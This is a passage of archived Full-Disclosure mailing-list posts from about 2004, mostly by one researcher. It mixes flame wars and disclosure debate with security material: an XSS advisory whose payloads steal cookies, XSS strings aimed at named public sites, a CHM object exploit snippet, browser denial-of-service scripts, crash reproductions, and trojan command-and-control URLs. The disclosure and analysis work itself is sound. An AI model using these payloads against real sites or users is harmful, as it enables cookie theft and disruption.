Ron, PLEASE STFU KTHNX ( you too Larry S. ) Who the f*ck cares, they hired him, if you dont like the company, dont patronize them for business. But please shutthefuckup. Why? 1. You have nothing to contribute. 2. you bitch and moan about things that are truly insignifigant. 3. you are a Media Whore(s) 4. please see items 1-3 note: Item 4 is also applicable to Nick F. and Valdis K. m.wood ahh, yes, but trust is a major component of this business. would you hire the person that sole all your valuables from your home to guard it for you? would you really trust them if you were ignorant enough to do so? Thanks, Ron DuFresne ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] New GDI exploit
reverse successfull... m.wood Game over... So the exploit is out that will open a local command prompt on the machine exploiting the GDI library.. This thing allows 2500 bytes of shellcode.. How long before this turns nasty? Seems easy to me to make it reverse shell... The problem I have is patching with SMS. MBSA won't pickup the needed patched in SMS so you have to push out to all machines in a container for a certain software type- IE XP VIsio blah blah so on The cycle continues.. JP ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Scandal: IT Security firm hires the author of Sasser worm
guess they shouldnt have publicized it. ( who cares ) @stake / Symantec - business is business, Symantec is aquiring not only tools and expertise, but possibly more importantly a broader, richer client base. ( again, who cares ) I do however find this interesting... the below suggests that a persons and or persons affilliated with a TROJAN coding history ( and a bad one at that ) is now ( or has been ) working with / for GFI. look here: http://s93625203.onlinehome.us/news.php we will see you on sub7.net... in the not so distant future, for new tools... in the mean time visit www.forcedcontrol.com and www.gfi.com for blades LanGuard fc.com ( trojan ddos kiddie :ed) and its crew have finished to move onto other professional projects. bla bla conclusion: blade ( a former? virus / trojan coder ) works for and is / was a major player for GFI. and now ( blade / GFI ) is possibly now recruting other known viri / trojan coders? research: http://www.google.com/search?hl=enie=UTF-8newwindow=1safe=offq=blade+Languardspell=1 www.come.to/soul4blade GFI http://www.google.com/search?q=soul4bladebtnG=Searchhl=enlr=ie=UTF-8newwindow=1safe=off http://www3.ca.com/securityadvisor/virusinfo/virus.aspx?ID=3282 Removal of the file and/or the registry entry will disable Blade Runner. For further information on Blade Runner please see http://www.come.to/soul4blade (link valid 29/03/00). nuff said, m.wood ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] [PoC] Nasty bug(s) found in Axis Network Camera/Video Servers
password issues known to exist.. http://www.google.com/search?hl=enlr=ie=UTF-8newwindow=1safe=offq=axis+camera+exploit http://www.google.com/search?hl=enlr=ie=UTF-8newwindow=1safe=offq=axis+camera+vulnerability or... http://www2.corest.com/common/showdoc.php?idx=329idxseccion=10 http://www.securityfocus.com/bid/3640/exploit/ To: [EMAIL PROTECTED] Date: Mon, 16 Aug 2004 22:48:38 +0200 (CEST) try the contact page? http://www.axis.com/corporate/contact.htm err... m.w ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] new email virus?
object data=http://www.v%69k%6F%72d.com/default.htm;brbr
this is a data tag .chm exploit
[textarea id=code style=display:none;]
[object
data=#109;s-its:%6D%68%74%6D%6C:file://C:\drqwtt.mht!${PATH}/default.chm::
/default.htm type=text/x-scriptlet][/object]
[/textarea]
[script language=javascript]
document.write(code.value.replace(/\${PATH}/g,location.href.substring(0,loca
tion.href.indexOf('default.htm';
[/script]
m.wood
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] [PoC] Nasty bug(s) found in Axis Network Camera/Video Servers
password issues known to exist.. http://www.google.com/search?hl=enlr=ie=UTF-8newwindow=1safe=offq=axis+camera+exploit http://www.google.com/search?hl=enlr=ie=UTF-8newwindow=1safe=offq=axis+camera+vulnerability or... http://www2.corest.com/common/showdoc.php?idx=329idxseccion=10 http://www.securityfocus.com/bid/3640/exploit/ To: [EMAIL PROTECTED] Date: Mon, 16 Aug 2004 22:48:38 +0200 (CEST) try the contact page? http://www.axis.com/corporate/contact.htm err... m.w ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] ws_ftp.log
your serious?? this issue has been arround for about 10 years... try googling ws_ftp.ini where you can simply drop the ini in your ws_ftp folder, convert the hashes or import into your favorite ftp client that supports ws_ftp.ini style format. m.wood - Original Message - From: Gaurang Pandya [EMAIL PROTECTED] To: [EMAIL PROTECTED] Sent: Sunday, August 15, 2004 5:19 AM Subject: [Full-Disclosure] ws_ftp.log Hi, WS_FTP is a popular feature rich ftp client. It makes upload/download as easy as drag drop. But mostly peoples using this forget that it creates a log file with name ws_ftp.log. This file holds sensitive data such as file source/destination and file name, date/time of upload etc., People when use this to upload files to their website, never know that along with other files even ws_ftp.log file also gets uploaded to the webserver, making it globally accessible. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Re: Automated SSH login attempts?
wgte frauder.us/linux/ssh.tgz http://frauder.us serves up putty.exe ( v 0.54 ) on connect as frauder, no extension. Proally not your average admin tool setup... m.wood ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] IE
i am qurious if a regedit setting exist in order to alter the user agent of the browser and to conseal info. under windows... HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\User Agent\Post Platform use anything... ( including javascript [hinthint] ) m.wood ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: AW: [Full-Disclosure] Firefox 0.92 DoS via TinyBMP
it seems to just be loading a bunch of data ( 1851MB ) via images
to consume memory.
the same effect can be accomplished here...
http://msdn.microsoft.com/library/default.asp?url=/library/en-us/dninstj/html/privacyforbrowserusers.asp
-- snip --
Such memory protection systems aren't foolproof. Even for normal memory and
non-ActiveX controls, this script fragment will bring most browsers quickly
to their knees (don't try this unless you're willing to re-boot):
HTMLBODYSCRIPT
var big_string = double me up!;
while (true)
{
big_string = big_string + big_string; // 20 iterations equals all your
memory...
}
/SCRIPT/BODY/HTML
-- snip --
or not
m.wood
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Erasing a hard disk easily
Since that time I have seen sensationalist TV shows showing how FBI and CIA operatives get stuff out written to a sector BEFORE the sector was overwritten and I honestly cannot understand how that could be, if at all possible. Am I right in thinking those shows are bull? simple... by analizing the magnetics of the disk one write makes 010101 etc the 0's and 1's are written to the disk by a magnetic manipulation to the disk there is a level of magnetisim than can be measured the disk electronics detect this difference. lets say a 0 can be between .000 and .010 and a 1 is between .996 and 1.00 when you write again over the data, the magnetic properties of the disk rember slightly the previous write. now when you analize the disk there is a ghosting of the previous data example... new data pits 0 =.009 1=.999 ( ghost pits ) 0=.003 1=.997 the drive electronics will detect the higher magnetic pits as actual data and discard the data below the new threshold. recovering the ghost data is now trivial by setting the thresholds below the new data levels.. logic: discard any data over .004 for 0 and .996 for 1s this is a very basic example of course but shows how this technique is used. Donnie Werner ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Re:
http://exploit.wox.org/babelpr0x.html try babelfish? m.wood http://exploit.wox.org/tools/googleproxy.html But with that (it is only the google translator), you aren't anonymous, because the images and other files aren't translated, and they are loaded directly from the server. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] IFH-ADV-31337 File Source disclosure vulnerability in all web servers.
rofl, are you sure your not Bipin ? Subject: [Full-Disclosure] IFH-ADV-31337 File Source disclosure vulnerability in all web servers. File Source disclosure vulnerability in all web servers. Remote explotation of this issue can be achived by clicking with the right button into the website and selecting the view source code option. This option will display the contents of the html code. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] Surgemail - Multiple Vulnerabilities
- EXPL-A-2004-002 exploitlabs.com Advisory 028 -
- Surgemail -
OVERVIEW
SurgeMail is a next generation Mail Server -
Combining features, performance and ease of
use into a single integrated product.
Ideal on Windows NT/2K, or Unix (Linux, Solaris etc)
and supports all all the standard protocols
IMAP, POP3, SMTP, SSL, ESMTP.
Surgmail suffers from two basic remote vulnerabilities...
1. Information Disclosure, by providing a non existant filename, the STDERR
is rendered to the user, disclosing physical directory structure.
2. XSS ( cross site scripting ) via the login form, and in particular
the username field. This allows for credential theft via externaly
hosted malicous script. This affects both HTTP and HTTPS access vectors.
AFFECTED PRODUCTS
=
Surgemail ( Win32 and *nix through versions 1.9 )
WebMail v3.1d Copyright © NetWin Ltd
http://netwinsite.com/index.html
http://netwinsite.com/overviews.htm
http://netwinsite.com/server/email_server_software.htm
DETAILS
===
1. Information Disclosure
Surge mail's web based interface reveals physical
directory structure by requesting a non-existant
(404) request.
http://x.x.x.x/[non-existant request]
http://x.x.x.x:7080/scripts/
Could not create process D:\surgemail/scripts/ Access Denied
Is the url correct, check for a log file in the scripts directory
and run the process in a shell window (D:\surgemail)
http://x.x.x.x:7080/scripts/err.txt
Could not create process D:\surgemail/scripts/err.txt File Not Found
Is the url correct, check for a log file in the scripts directory
and run the process in a shell window (D:\surgemail)
http://x.x.x.x/scripts/err.txt
CGI did not respond correctly, it probably exited abnormally or the file
may not exist or have +x access (/usr/local/surgemail/scripts) (err.txt) ()
2. XSS ( cross site scripting )
The login form username field is vunerable to XSS
snip
http://x.x.x.x:7080/
http://x.x.x.x:7080/scriptalert('Vulnerable')/script
http://x.x.x.x:7080/scriptalert(document.cookie)/script
snip
SOLUTION
Vendor contacted May 16, 2003 [EMAIL PROTECTED]
Vendor acknowlegement recieved May 17, 2003
Vendor Patch / Version 2.0c released June 2, 2004
and may be obtained at
ftp://ftp.netwinsite.com/pub/surgemail/beta
http://www.netwinsite.com/surgemail/help/updates.htm
PROOF OF CONCEPT
( see DETAILS )
CREDITS
===
This vulnerability was discovered and researched by
Donnie Werner of exploitlabs
mail: [EMAIL PROTECTED]
--
web: http://exploitlabs.com
web: http://zone-h.org
ref: http://zone-h.org/en/advisories/read/id=4714/
ref: http://exploitlabs.com/files/advisories/EXPL-A-2004-002-surgmail.txt
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Beware of 'IBM laptop order' email
http://www.f-secure.com/v-descs/wallon.shtml Last week on the site of 'The Register' an article was published about spam-mail that used an unknown 'zero-day' vulnerability in IE. They did not release any information about the zero-day issue, so perhaps anyone on the list knows anything about this issue and whether or not this issue is really a zero-day vulnerability or just a old one, The article can be found at the following URL: http://www.theregister.co.uk/2004/05/24/fake_order_viral_scam/ ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Vendor casual towards vulnerability found in product
I have the following queries 1. Would an exploit like this be said to be severe? yes 2. Is the vendor right in their approach to this issue? not entirely 3. How do I make public the vulnerability? (Vendor has given permission for the same) post it here, on your site, or another security list 4. Ok, I'll rather ask... *should* I make public details of this vulnerability? (Since I know of sites using this app server, and they may be taken down if the exploit goes out) yes, mabey the vendor will wake up that said, It seems the vendor knows of the flaw, and is easily remedied by the aforementioned non default setting and documentation reflecting that it is a good thing to enable said option. Often a disclosure policy helps vendors stay on track some disclosure policys can be found at.. http://oisafety.org/ http://oisafety.org/process.html http://exploitlabs.com/disclosure-policy.html http://www.cert.org/kb/vul_disclosure.html http://www.atstake.com/research/policy/ http://www.hut.fi/~tianyuan/slides/template/template.html Donnie Werner http://exploitlabs.com ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] Microsoft Defaced ( again )
Zone-h.org reports.. A Portuguese group dubbed Outlaw group has defaced the Microsoft.com web site, the hacked page (www.microsoft.com/mspress/uk/) isn't available anymore since 9:00pm GMT read more... http://zone-h.org/en/news/read/id=4251/ m.wood ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] ActivePerl Perl2Exe [was] Buffer Overflow in ActivePerl ?
further testing...
c:\type test1.pl
#test1.pl
$a=A x 256; system($a);
http://[host]/test1.pl
[host - output ]
The instruction at 0x28073f63 referenced memory at 0x01c42ce0.
The memory could not be read
c:\type test2.pl
#test2.pl
$a=A x 261; system($a);
http://[host]/test2.pl
[host - output ]
The instruction at 0x28073f63 referenced memory at 0x42c42ce0.
The memory could not be read
Donnie Werner
http://exploitlabs.com
- Original Message -
From: Stephen Blass [EMAIL PROTECTED]
To: [EMAIL PROTECTED]
Sent: Thursday, May 20, 2004 2:15 PM
Subject: RE: [Full-Disclosure] ActivePerl Perl2Exe [was] Buffer Overflow in
ActivePerl ?
Perl2Exe rolls the interpreter up into the exe so if the interpreter is
vulnerable, then the exe will be too. With the service compiler you will have
the same situation in services compiled as 'standalone'; if you compile
'dependent' services you are at the mercy of the perl interpreter on the system
you deploy the service on.
You can change the behavior of the perl 'system' in a perl script like so.
use subs qw (system);
sub system { my ($cmd)[EMAIL PROTECTED]; printwhat, me run $cmd ? ; }
$a=A x 256; system($a);
You can reach out from your custom system subroutine to the real thing if
you'd like by calling CORE::system if you want to scrub arguments some more
before passing them to the system.
-
Steve Blass
-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] Behalf Of Clint
Bodungen
Sent: Thursday, May 20, 2004 12:44 PM
To: morning_wood; 0day; [EMAIL PROTECTED]
Subject: Re: [Full-Disclosure] ActivePerl Perl2Exe [was] Buffer Overflow
in ActivePerl ?
I haven't tested it yet but this also probably means that the msi/Microsoft
service compilor in the Activeperl Developer's Kit is as well then.
- Original Message -
From: morning_wood [EMAIL PROTECTED]
To: 0day [EMAIL PROTECTED]; [EMAIL PROTECTED]
Sent: Thursday, May 20, 2004 2:08 PM
Subject: [Full-Disclosure] ActivePerl Perl2Exe [was] Buffer Overflow in
ActivePerl ?
binaries created via perl2exe also are affected.
C:\type 1.pl
#
$a=A x 256; system($a);
C:\perl2exe -v 1.pl
Perl2Exe V7.02 Copyright (c) 1997-2003 IndigoSTAR Software
Cmd = -v 1.pl
CWD = C:\
Known platforms: Win32
Target platform = Win32 5.006001
$I =
$ENV{'PERL5LIB'} =
Found perl.exe at C:\Perl\bin
LibList = C:\Perl\lib,C:\Perl\site\lib,.
Converting '1.pl' to 1.exe
Compiling 1.pl
C:\1.exe
[BIG CRASH]
C:\
Donnie Werner
http://exploitlabs.com
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] ActivePerl Perl2Exe [was] Buffer Overflow in ActivePerl ?
binaries created via perl2exe also are affected.
C:\type 1.pl
#
$a=A x 256; system($a);
C:\perl2exe -v 1.pl
Perl2Exe V7.02 Copyright (c) 1997-2003 IndigoSTAR Software
Cmd = -v 1.pl
CWD = C:\
Known platforms: Win32
Target platform = Win32 5.006001
$I =
$ENV{'PERL5LIB'} =
Found perl.exe at C:\Perl\bin
LibList = C:\Perl\lib,C:\Perl\site\lib,.
Converting '1.pl' to 1.exe
Compiling 1.pl
C:\1.exe
[BIG CRASH]
C:\
Donnie Werner
http://exploitlabs.com
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Re: Buffer Overflow in ActivePerl ?
and we seem to get control of EIP. Coincidence? Try yet two more: C:\perl -e $a=A x 261; system($a) C:\perl -V Characteristics of this binary (from libperl): Compile-time options: MULTIPLICITY USE_ITHREADS PERL_IMPLICIT_ LICIT_SYS Locally applied patches: ActivePerl Build 635 Built under MSWin32 Compiled at Feb 4 2003 15:34:21 @INC: C:/Perl/lib C:/Perl/site/lib . C:\ C:\perl -e $a=A x 261; system($a) The input line is too long. [CRASHE HERE] C:\ ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Buffer Overflow in ActivePerl ?
Can anybody reproduce this? Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. C:\perl -e $a=A x 256; system($a) 'AAA A' is not recognized as an internal or external command, operable program or batch file. [BIG CRASH HERE] C:\perl -v This is perl, v5.6.1 built for MSWin32-x86-multi-thread ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Sasser author
Sasser violates poorly designed/implemented network infrastructures. kinda like breaking into a room via a locked door, through a window in said locked door. The door design does not impliment a proper design infrastructure for the intended application. Jail the mfg of the Door?? i think not. The door is not of suitible design for the intended security application, sure, but someone did circumvent the security device ( the lock ) via an exploitable flaw ( the window). Still a clear case of breaking and entering, not to memtion circumvention of an access device ( the lock in the door ). my 2bits. D. Werner ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] A rather newbie question
that sure got their attention! just keep this up but after informing the isp that if they cannot protect your network then you would have to take active steps to protect your network which includes all the network scanning and namapping etc since when is it the ISP's job to protect your network , unless you have an agreement with them that they will be protecting your network. m.w ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: Subject: [Full-Disclosure] Some suspicious files
sneaker
possibly a beta version of a connect back trojan.
seems to be able to use a website to transfer information between the
attacker and the infected machine.
appredir-username=some_irc_guy
client version=sneaker_0.19
cmd-url=http://1337suxx0r.ath.cx:580/hack/sneaker/cmd.php=login-url=http://1337s
uxx0r.ath.cx:580/hack/sneaker/login.php
opfer-info=some_irc_guy
/s7regkey={13371337-1337-1337-1337-133713371337}
SubSeven Startup Method (requires Config Setting s7regkey)
m.w
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] McAfee Website XSS
http://vil.mcafee.com/alphar.asp?char=SCRIPTalert(document.cookie);/SCRIPTS CRIPTalert(document.cookie);/SCRIPT D.Werner http://nothackers.org ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] viruses being sent to list
Tamas Feher wrote... 1., First Amendment defines free speech. Source code has been proven free speech. Executables are not covered by free speech this statement is illogical. what exactly makes string of characters executable ? MZ? elf? contained in the first few bytes / bits? please define exactly WTF you mean here. you can convert a windows executable to a vbs...is this still an executable? just because some order of words in a computer file is somehow compiled by a higher language interpeter to run naitvly on some processing type of device, under some operating type computing system that this is automagically different in some aspect?? please please explain this to me in simple, logical terms. how about wormwriters only target persons with compilers installed??? then they can just send source code and then its compiled on the target ( dont many *nixy viri do exactly this? ) if i renamed a viri.exe to viri.exe.txt, then this is not in executable form, but yet contains the same information, in the same order of bits.. .. there is only one difference i see, someone without the ability to produce native code from a language source to run on said processing type of system, can't run said code VS one who does and can. are you being serious here??? m.wood ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] H9-0001 Advisory: Sphiro HTTPD remote heap overflow (Rosiello Security)
Hi morning wood. Aren't you the guy who ran a vulnerable demo version of some windows ircd for your security team? Oh no maybe someday you might be important enough to be Rosiello Jr Security Analyst. no, i ran a personal IRCD that was attacked by the by the precursor of msblaster ( proc32.exe ) and it was a DoS to my connection, not a buggy IRCD. details may be read at http://exploitlabs.com/attack/RPC-DCOM-DD0S-attack.txt or http://lists.virus.org/dw-0day-0308/msg1.html or http://www.blacksheepnetworks.com/security/security/fulldisc/5779.html get you facts straight mmmk ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] Heads up: Possible lsass worm in the wild
dropped file: %SYSTEM%/msiwin84.exe
remote process established to: lsass.exe
remote ip:4.x.x.x
note: file msiwin84.was not running
this appears to be a blaster type of worm working on the first and / or
second subset of the infected host to begin scanning for more hosts.
I have not completly unpacked the binary but here is some strings.
-- snip --
DnsFlushResolve
{ache.dapi.dllVQUIT RIVMSG %s : screw you KGGo home cCmd.Net, +MODEW ]m715
522947
6660M USERHOST/@ JOINFL :YnASSo DCC \ND o:.bmpJd Error: fixipS enc5n clos
*+h2(P/ t,O cu.g ACHO=Ds NEU(fkbit/s) tal!x [EMAIL PROTECTED]'Q_ IP addrvs3
-- snip ---
based on the above, the worm / viri tries to connect to a IRC server.
anyone else experiencing this?
morning_wood
http://exploitlabs.com
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] H9-0001 Advisory: Sphiro HTTPD remote heap overflow (Rosiello Security)
Unrelated but funny stories of rave (Jonny Mast) getting owned: - rave gets his account backdoored on kokanin's box. He finds the obviously Apr 24 13:25:18 rave KOKANIN UR BOX IS FUKCING HACKED AND ALL MY STUFF IS GONE! rofl, DTORS owned again. hi there kokanin, b0f, htols, bob lmfao ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] Cisco LEAP clueless exploit tool...
From: [EMAIL PROTECTED]
ahh nevermind, it's clear neither of you have the
desire to learn
mabey they need this...
- snip -
#!/usr/bin/perl
#
# the perl of security ( gettn' a clue )
# by m.wood
#
# version 1.03
#
use CommonSense; # you do have this module... right?
use Logic; # just the facts
require IO::openMind;
print(get a clue\n);
my $awareness=$perspective,$insight;
#give input here
my $newskill=STDIN;
if(defined $clueless) {
perspective($clueless);
exit; # die here... your stupid
}
# sub aquire skill
for $security {
$perspective(openMind+($awareness));
if($insight-from($newskill));
}
}
print now you have a clue, kthnx\n;
exit;
- snip --
hope this helps,
m.wood
http://exploitlabs.com
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Which worm?
Another question: Is there a quick way to find out which tool compressed an executable? A tool maybe? PEiD http://peid.has.it/ m.wood http://exploitlabs.com ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] Browser bugs [DoS] - Do they bite?
Browser bugs [DoS] ... where will you draw a line? DoS bugs that cause permanent damage are treated differently, of course. For example, I could imagine a bug that would corrupt some critical file what about Browser bugs[DoS] a XSS vunerable site? simple javascript leveraged against a host that has a XSS issue. so if you could embed scriptjavascript:location.reload()/script in a high traffic, XSS'able site, you could cause a denial of service to the webserver from the users trying to view the site. http://host/stupidscript?someoption=scriptjavascript:location.reload()/script will continuily refresh to http://host/stupidscript , since it is XSS'able, the server returns the script only to be executed again and again and ( you get the picture ) could be used legitematly for a net-sit-in to deny a site as well. see: http://nothackers.org/pipermail/0day/2003-October/000236.html and exactly why does this produce such an odd result? http://ws.arin.net/cgi-bin/whois.pl?queryinput=scriptjavascript:location.reloa d()/script Search results for: (N) orwegian Telecommunications Administration (OTA) (A) sian Development Bank (SDB-1) USDA - Office of Operations (UOO) Shipleys Donut Shops ( yum! donuts. but they did fix thier XSS ) m.wood http://exploitlabs.com ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] FAT32 input output = null?
executing this at the dos promt would create a zero byte m.wood file m.wood looks like a feature equivalent to touch m.wood or touch filename LMFAO m.wood Delivered using the Free Personal Edition of Mailtraq (www.mailtraq.com) ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] FAT32 input output = null?
[EMAIL PROTECTED]:~$ more testfile.txt Let's try this in Linux [EMAIL PROTECTED]:~$ ls -al testfile.txt - -rw-r--r--1 chrisusers 24 Apr 7 12:43 testfile.txt [EMAIL PROTECTED]:~$ testfile.txttestfile.txt - -bash: ./testfile.txt: Permission denied [EMAIL PROTECTED]:~$ more testfile.txt [EMAIL PROTECTED]:~$ ls -al testfile.txt - -rw-r--r--1 chrisusers 0 Apr 7 12:44 testfile.txt [EMAIL PROTECTED]:~$ anyone try with a executable? mabey linibox$ pwd /usr/bin linibox$ bash bash m.wood ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] FAT32 input output = null?
You can also delete files by using the del command. I tested this with the 5.1 ntos kernel (Slackware XP): C:\del testfile.exe if you were trying to be sarcastic in saying this is normal, any dummy knows that then you failed horrendously, sir. where did the delete command came from this has nothing to do with any system command it was simply an odd behavior where by piping output of a file into itself, causes a 0 byte or corrupted file C:del.exe del.exe in particular, executeable files. m.wood ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] FAT32 input output = null?
Fat32 file output redirect overwrites self. === odd behavior... ? 1.) console application output redirected to itself ( file.ext file.ext ) C:\testprogram.exe program.exe program.exe The process cannot access the file because it is being used by another process. ok great, normal error ( i thought ) by seeing this error, one might think phew, i just saved myself from overwriting that file but 2.) try running original program C:\testprogram.exe [popup] C:\test\program is not a valid Win32 application. [/popup] Access is denied. uh-o 3.) directory listing C:\testdir Volume in drive C has no label. Volume Serial Number is 1F2E-1405 Directory of C:\test 02/16/2003 03:00 AMDIR . 02/16/2003 03:00 AMDIR .. 02/16/2003 03:31 AM 0 program.exe 9 File(s) 0 bytes 2 Dir(s) 435,847,168 bytes free i do not know if this is proper behavior. but it would appear that you SHOULD be safe due to windows file locking, and the saftey is further bolstered by nice warning. but alas... Access Denied! so by observance we can deduce the following: a. windows reads the originating program into memory ( fully(?) b. the file output redirection ( ) causes a write to file to the redirection call back upon itself, and thus begins overwriting the original file. c. windows detects the file access and determines that this action is illegal and halts the operation and warns the user. note: not tested under other disc formats. Donnie Werner http://exploitlabs.com ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] MCSE training question
Oh contraire, the first thing we do when we go onsite to work on windows box is ask my client to reboot it first, particularly if it is a server, as occassionally they they do not come back up, and we do not want to be blamed just because the OS is unstable and you claim to be a security professional? ( Curt Purdy CISSP, GSEC, MCSE+I, CNE, CCDA ) the first thing would be to sit down at the suspect console and observe. the second thing would be to... observe. then i might consider a course of action... possibly the box in question is instable because of a compromise, or a worm or a 0day... what about that Curt? never would i ( or tell anyone ) to just reboot that box before i touch it now i know why fortune 500 companies get horrendous infections. shocked and awed Donnie Werner http://exploitlabs.com ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] ron1n phone home, episode 2
k-rad this is old... mmmk possibly someone not from bbs days may not remember.. i got offline between 93-95 We present to you the second installment of our introductionary series into the exciting world of Mostly Harmless Hacking. Hacking from Windows 95. Copyright 1997 ( recycling old zine's huh? ) m.wood ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] Microsoft Security CD
well... i got mine, but funny thing.. pstrongThis CD requires that JavaScript be enabled for your Web browser./strong /p pIf you need help re-enabling JavaScript for your browser, a href=http://go.microsoft.com/fwlink/?linkid=9580; target=_blankclick here/a./p then offers this screen... You are downloading the file: WXPstart.hta from d:\Content open save cancel moreinfo being inquisitive and security minded i chose save then i was left with a blank browser. and a hta file on my desktop.. DOH! anyway, the major XP/2Kx updates are as listed... Directory of D:\Content\fullfixes 02/05/2004 04:00 AMDIR . 02/05/2004 04:00 AMDIR .. 02/05/2004 04:00 AM 970,312 DirectX9-KB819696-x86-ENU.exe 02/05/2004 04:00 AM10,135,688 MPSetupXP.exe 02/05/2004 04:00 AM 818,464 Q819696_WXP_SP2_x86_ENU(DX8).exe 02/05/2004 04:00 AM 135,477,136 W2KSP4_EN.EXE 02/05/2004 04:00 AM 938,856 Windows2000-KB824146-x86-ENU.exe 02/05/2004 04:00 AM 367,752 WindowsMedia8-KB817787-x86-ENU.exe 02/05/2004 04:00 AM 433,952 WindowsXP-KB823182-x86-ENU.exe 02/05/2004 04:00 AM 346,400 WindowsXP-KB824105-x86-ENU.exe 02/05/2004 04:00 AM 305,248 WindowsXP-KB825119-x86-ENU.exe 02/05/2004 04:00 AM 9,442,912 WindowsXP-KB826939-x86-ENU.exe 02/05/2004 04:00 AM 365,664 WindowsXP-KB828035-x86-ENU.exe 02/05/2004 04:00 AM 369,504 js56nen.exe 02/05/2004 04:00 AM 1,992,832 q330994.exe 02/05/2004 04:00 AM 2,203,776 q828750.exe 02/05/2004 04:00 AM 131,170,400 xpsp1a_en_x86.exe 15 File(s)295,338,896 bytes 2 Dir(s) 0 bytes free Donnie Werner http://exploitlabs.com ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] erase with magnet
Is it possible to erase data on a hard disk drive with a powerful magnet, but then be able to use the drive and the PC again? yes m.wood ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Re: [FD] FD should block attachments
Since some folks presumably want to be able to send and receive the latest MS innovations and other attachments, why don't you just block whatever you don't want to receive? I certainly do. yes, exactly why is this concept so hard to get? im presuming that the majority of complaintants are either not very security minded to begin with, or are complete n00bs ( joned the list cuz they saw it was on CNN ). i like attatchments, whether they are PoC, viri, worm, pdf, etc etc. i like the choice to choose. btw: i use Microsoft products [OE] to post to this list, and have never got any virus or worm or anything else i didnt want. and i do not run any AV nor filtering nor firwall to this box. am i missing something here? because i realy do not see the issue. morning_wood http://exploitlabs.com ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] mirc 6.14
